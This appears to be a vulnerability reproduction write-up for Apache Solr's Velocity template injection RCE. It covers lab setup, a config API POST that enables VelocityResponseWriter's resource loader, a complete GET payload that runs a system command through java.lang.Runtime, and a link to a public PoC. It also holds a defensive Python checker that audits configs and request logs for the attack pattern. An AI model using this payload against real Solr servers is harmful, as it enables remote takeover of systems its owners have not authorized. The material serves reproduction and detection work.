0x01 Introduction
Solr is an enterprise-grade standalone search application server that exposes its services through a web service API. Users submit XML documents in a defined format to the server over HTTP to build indexes, and issue search requests over HTTP GET, receiving the results in XML format.
0x02 Vulnerability Introduction
Solr ships with the VelocityResponseWriter component. An attacker can send a crafted request that modifies the relevant configuration so that VelocityResponseWriter is allowed to load a caller-specified template; this Velocity template injection results in remote command execution. An attacker who exploits this vulnerability gains direct control of the server.
0x03 Scope of impact
Apache Solr 5.x - 8.2.0 (versions in which the config API exists)
0x04 Environment Construction
Install a Java 8 environment, then download Solr from the following address:
https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip
After downloading, decompress the archive, enter the bin directory, and run ./solr start
unzip solr-8.2.0.zip
Some warning messages will appear during startup. We can silence them by editing the solr.in.sh file under bin and setting SOLR_ULIMIT_CHECKS to false
vim solr.in.sh
Then start again with ./solr start. If startup as root fails, append -force to the command
Visit http://ip:8983 in the browser; if the following interface appears, the installation succeeded
However, it turns out that a core cannot be created from the UI
We first set it up manually: create a new_core folder under the /server/solr/ directory, copy the conf directory from /server/solr/configsets/_default/ into new_core, and then click Create
0x05 Vulnerability Reproduction
After creating the core, visit the following URL to check whether the core's config file can be accessed
http://ip:8983/solr/new_core/config
Apache Solr integrates the VelocityResponseWriter plug-in by default. In the plug-in's initialization parameters, params.resource.loader.enabled defaults to false. However, this setting can be changed directly through a POST request to the config API, setting it to true; after that, a specially crafted GET request achieves remote code execution.
Use Burp to capture the request for this page, turn it into a POST request, and add the following data as the body
```json
{
"update-queryresponsewriter": {
" startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir" : "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
```
Next we can construct the payload to achieve RCE
payload:
```
http:// ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=#set($x='') #set($rt=$x.class.forName('java.lang .Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) # set($ex=$rt.getRuntime().exec('id')) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out .available()])$str.valueOf($chr.toChars($out.read()))#end
```
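From the defender's side, the two steps above leave concrete traces: the config API response shows a VelocityResponseWriter whose resource loaders have been switched on, and the request log shows a select request combining wt=velocity with an inline v.template.* parameter. The following check is added here and is not code from the original post or from the Solr project; the shape of the /solr/<core>/config response and the NCSA-style request-log layout are assumptions, and both samples are constructed.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Writer class and config keys named in the post; the /config response shape
# and the NCSA-style request-log layout below are assumptions.
VELOCITY_CLASS = "solr.VelocityResponseWriter"
LOADER_KEYS = ("params.resource.loader.enabled", "solr.resource.loader.enabled")

# Constructed sample of a GET /solr/<core>/config response.
SAMPLE_CONFIG = json.dumps({
    "responseHeader": {"status": 0},
    "config": {"queryResponseWriter": {
        "json": {"class": "solr.JSONResponseWriter"},
        "velocity": {"class": VELOCITY_CLASS, "startup": "lazy",
                     "template.base.dir": "",
                     "params.resource.loader.enabled": "true"},
    }},
})

# Constructed request-log lines; the second carries the wt=velocity pattern.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /solr/new_core/select?q=*:*&wt=json HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /solr/new_core/select?q=1&wt=velocity'
    '&v.template=custom&v.template.custom=placeholder HTTP/1.1" 200 90',
]

def audit_config(config_json: str) -> dict:
    """Map each VelocityResponseWriter to the resource-loader flags set to true."""
    writers = json.loads(config_json).get("config", {}).get("queryResponseWriter", {})
    findings = {}
    for name, spec in writers.items():
        if spec.get("class") != VELOCITY_CLASS:
            continue
        enabled = [k for k in LOADER_KEYS if str(spec.get(k, "false")).lower() == "true"]
        if enabled:
            findings[name] = enabled
    return findings

_REQUEST = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/')

def is_velocity_template_request(line: str) -> bool:
    """Flag a log line whose query selects wt=velocity and passes an inline v.template.* value."""
    match = _REQUEST.search(line)
    if not match:
        return False
    params = parse_qs(urlsplit(match.group("url")).query)
    uses_velocity = any(v.lower() == "velocity" for v in params.get("wt", []))
    inline_template = any(k.startswith("v.template.") for k in params)
    return uses_velocity and inline_template
```

Running audit_config against the live config endpoint of each core, and the log check over the Jetty request log, surfaces both the configuration change and the attempted use of it.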
POC address: https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template
0x06 Repair method
Update to the latest version.